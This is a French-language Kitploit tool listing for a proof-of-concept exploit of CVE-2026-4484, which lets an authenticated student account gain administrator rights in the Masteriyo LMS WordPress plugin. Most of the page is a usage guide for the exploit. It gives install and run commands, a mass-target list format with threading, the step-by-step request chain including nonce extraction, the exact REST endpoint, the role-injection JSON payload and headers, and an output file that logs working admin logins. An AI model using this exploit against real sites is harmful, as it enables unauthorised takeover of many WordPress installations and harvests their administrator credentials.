Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 - Absence de contrôle d'autorisation permettant à un utilisateur authentifié (Étudiant+) d'élever ses privilèges jusqu'à Administrateur | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-4484
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Absence de contrôle d'autorisation permettant à un utilisateur authentifié (Étudiant+) d'élever ses privilèges jusqu'à Administrateur

Voir le dépôt
10il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Absence de contrôle d'autorisation permettant à un utilisateur authentifié (Étudiant+) d'élever ses privilèges jusqu'au rôle Administrateur

Typing SVG


🔴 Vue d'ensemble de la vulnérabilité

CVE-2026-4484 — Élévation de privilèges authentifiée (Étudiant → Administrateur)

ChampDétails
CVE IDCVE-2026-4484
SévéritéÉLEVÉE — Score CVSS v3.1 : 8.8
VecteurCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Logiciel concernéExtension Masteriyo LMS pour WordPress
Versions concernéesToutes les versions jusqu'à la 2.1.6 incluse
Type de vulnérabilitéÉlévation de privilèges (manipulation de rôles)
Authentification requiseOui — niveau Étudiant ou supérieur
CWECWE-269 : Gestion inappropriée des privilèges

Description :
L'extension Masteriyo LMS pour WordPress est vulnérable à une élévation de privilèges dans toutes les versions jusqu'à la 2.1.6 incluse. La vulnérabilité provient de la fonction InstructorsController::prepare_object_for_database, qui ne restreint pas correctement l'attribution des rôles lors des requêtes à l'API REST. Un attaquant authentifié disposant d'un simple accès de niveau Étudiant peut élaborer une requête POST spécialement conçue vers le endpoint REST de l'API Masteriyo — en injectant "roles": ["administrator"] dans le corps de la requête — pour élever silencieusement son compte au niveau Administrateur WordPress, prenant ainsi le contrôle total du site sans aucune interaction d'un administrateur.


🛠️ Description de l'outil

Il s'agit d'un script d'exploitation Proof-of-Concept (PoC) ciblant les installations WordPress exécutant une version vulnérable de l'extension Masteriyo LMS. L'outil prend en charge deux modes d'attaque :

ModeNomFluxCas d'utilisation
1Nx_1Inscription → Connexion → Élévation → Vérification adminAttaque depuis zéro — aucun compte existant requis
2Nx_2Connexion → Élévation → Vérification adminCompte existant disponible (Étudiant/Instructeur)

Flux d'attaque

[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 Prérequis

Configuration système requise

  • Python 3.8 ou plus récent
  • Linux / Windows / macOS

Dépendances Python

pip install requests urllib3 colorama

Ou via le fichier requirements :

pip install -r requirements.txt

requirements.txt :

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Installation

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ Utilisation

Exécution de base

python3 CVE-2026-4484.py

L'outil utilise une interface terminal interactive — tous les paramètres sont demandés à l'exécution.


🗂️ Format de la liste de cibles

Créez un fichier texte brut (par exemple list.txt) avec une cible par ligne :

https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 Mode 1 — Nx_1 (Inscription + Connexion + Élévation)

Utilisez ce mode lorsque vous ne disposez d'aucun compte existant sur la cible. L'outil enregistre automatiquement un nouveau compte étudiant, puis l'élève.

Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

Étapes exécutées automatiquement :

  1. GET /account/signup/ → extraire le nonce d'inscription
  2. POST /st/ → créer un nouveau compte en tant qu'Étudiant
  3. GET /account/ → extraire le nonce de connexion
  4. POST /wp-admin/admin-ajax.php → se connecter via AJAX Masteriyo
  5. GET /account/#/dashboard → extraire current_user_id + nonce
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} avec {"roles":["administrator"]}
  7. Reconnexion avec une nouvelle session → vérifier l'accès au panneau d'administration
  8. Écrire les succès confirmés dans Login_admin.txt

🟩 Mode 2 — Nx_2 (Connexion + Élévation — Compte existant)

Utilisez ce mode lorsque vous disposez déjà d'un compte Étudiant ou Instructeur valide sur la cible.

Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

Étapes exécutées automatiquement :

  1. GET /account/ → extraire le nonce de connexion
  2. POST /wp-admin/admin-ajax.php → se connecter via AJAX Masteriyo
  3. GET /account/#/dashboard → extraire current_user_id + nonce
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} avec {"roles":["administrator"]}
  5. Reconnexion avec une nouvelle session → vérifier l'accès au panneau d'administration
  6. Écrire les succès confirmés dans Login_admin.txt

📁 Fichiers de sortie

FichierDescription
Login_admin.txtToutes les élévations de privilèges vers administrateur confirmées

Format de sortie

https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

Exemple de sortie terminal

[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 Détails techniques

Endpoint vulnérable

POST /wp-json/masteriyo/v1/users/instructors/{user_id}

Payload d'exploitation

{
  "roles": ["administrator"]
}

En-têtes requis

Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

Cause racine

Télécharger l’outil